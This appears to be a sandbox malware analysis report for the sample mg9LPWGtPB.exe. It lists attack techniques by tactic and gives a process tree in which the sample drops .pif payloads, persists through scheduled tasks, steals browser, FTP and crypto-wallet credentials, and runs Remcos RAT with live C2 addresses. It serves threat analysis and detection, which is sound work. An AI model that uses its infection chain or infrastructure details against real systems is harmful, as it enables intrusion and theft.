Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (4); Input Capture (21); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (3); Application Layer Protocol (124); Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph
ID: 1472119
Sample: mg9LPWGtPB.exe
Start date: 12/07/2024
Architecture: WINDOWS
Score: 100

Sample-level DNS/IP: steamcommunity.com; sJavUoBfFUhkoScDaBgelALGvfC.sJavUoBfFUhkoScDaBgelALGvfC; 4 other IPs or domains
Sample-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 15 other signatures

Process tree (indentation = parent/child; "created files" counts as shown in the graph):

mg9LPWGtPB.exe (70 created files)
  Dropped: C:\Users\user\AppData\Local\Temp\Sensor (COM)
  Signatures: Found stalling execution ending in API Sleep call
  cmd.exe (2 created files)
    Dropped: C:\Users\user\AppData\Local\Temp\...\Hist.pif (PE32)
    Signatures: Drops PE files with a suspicious file extension; Uses schtasks.exe or at.exe to add and modify task schedules
    Hist.pif (42 created files)
      DNS/IP: steamcommunity.com 23.192.247.89, port 443 (local port 64934), AKAMAI-ASUS, United States; 216.245.184.74, port 80 (local port 64957), SRS-6-Z-7381US, United States; 3 other IPs or domains
      Dropped: C:\Users\user\...\Windows_Services_AS[1].exe (PE32); C:\ProgramData\softokn3.dll (PE32); C:\ProgramData\nss3.dll (PE32); 5 other files (3 malicious)
      Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
    cmd.exe
    conhost.exe
    7 other processes
  EHIJJDGDHD.exe (61 created files)
    Dropped: C:\Users\user\AppData\Local\Temp\Featured (DOS)
    Signatures: Multi AV Scanner detection for dropped file; Found stalling execution ending in API Sleep call
    cmd.exe (3 created files)
      Dropped: C:\Users\user\AppData\Local\Temp\...\Bk.pif (PE32)
      Bk.pif
        DNS/IP: 91.92.246.78, port 2404 (local port 64962), THEZONEBG, Bulgaria; geoplugin.net 178.237.33.50, port 80 (local port 64963), ATOM86-ASATOM86NL, Netherlands
        Dropped: C:\Users\user\AppData\Local\...\SolarSys.pif (PE32); C:\Users\user\AppData\Local\...\SolarSys.js (ASCII)
        Signatures: Detected Remcos RAT; Drops PE files with a suspicious file extension
        cmd.exe
          conhost.exe
          schtasks.exe
        schtasks.exe
          conhost.exe
      conhost.exe
      tasklist.exe
      7 other processes
  cmd.exe
    conhost.exe
    timeout.exe
wscript.exe
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  SolarSys.pif
wscript.exe
  SolarSys.pif
